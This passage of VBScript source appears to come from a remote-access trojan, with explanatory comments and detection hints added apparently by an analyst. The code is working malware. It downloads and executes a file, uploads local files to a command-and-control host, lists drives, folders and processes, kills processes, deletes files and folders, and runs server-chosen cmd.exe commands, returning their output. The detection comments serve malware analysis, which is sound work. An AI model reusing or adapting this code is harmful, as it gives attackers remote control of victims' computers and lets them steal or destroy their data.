    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
 set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
   .type = 1 
   .open
   .write objhttpdownload.responsebody
   .savetofile strsaveto
   .close
 end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


' upload: handler for the "recv" command; sends a local file to the C2.
' Reads the file at `fileurl` as binary through ADODB.Stream and POSTs the bytes to
' http://<host>:<port>/is-recving<|><fileurl>. Note the local path is part of the
' request URL, so proxy or network logs of affected hosts show which files were taken.
' The local `httpobj` declared here shadows the script-level one.
function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
  .loadfromfile fileurl
  buffer = .read
  .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


' enumdriver: lists ready drives as "<path>|<drivetype>" entries joined by spliter.
' The result is posted back under "is-enum-driver" by the main loop.
function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

' enumfaf: directory listing for `enumdir`. The result starts with the directory
' path, followed by one "<name>|<size>|<d or f>|<attributes>" record per subfolder
' (size left empty) and per file, each terminated by spliter.
function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


' enumprocess: process listing via WMI (Win32_Process). Each record is
' "<name>|<pid>|<executable path>" terminated by spliter.
function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
 enumprocess = enumprocess & objitem.name & "|"
 enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

' exitprocess: handler for "exit-process". Runs `taskkill /F /T /PID <pid>` minimized
' (window style 7) and waits for it to finish. `pid` comes straight from the server
' response and is concatenated into the command line.
' Detection: taskkill.exe spawned by wscript.exe.
sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

' deletefaf: handler for "delete". Tries to delete `url` first as a file and then as
' a folder; with errors suppressed, whichever call does not apply fails silently.
sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

' cmdshell: handler for "cmd-shell". Runs `%comspec% /c <cmd>` with WshShell.Exec and
' returns captured output: all of stdout if it has data, otherwise all of stderr,
' otherwise an empty string. The main loop posts the result back under "is-cmd-shell".
' Detection: cmd.exe child processes of wscript.exe with server-chosen command lines.
function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function
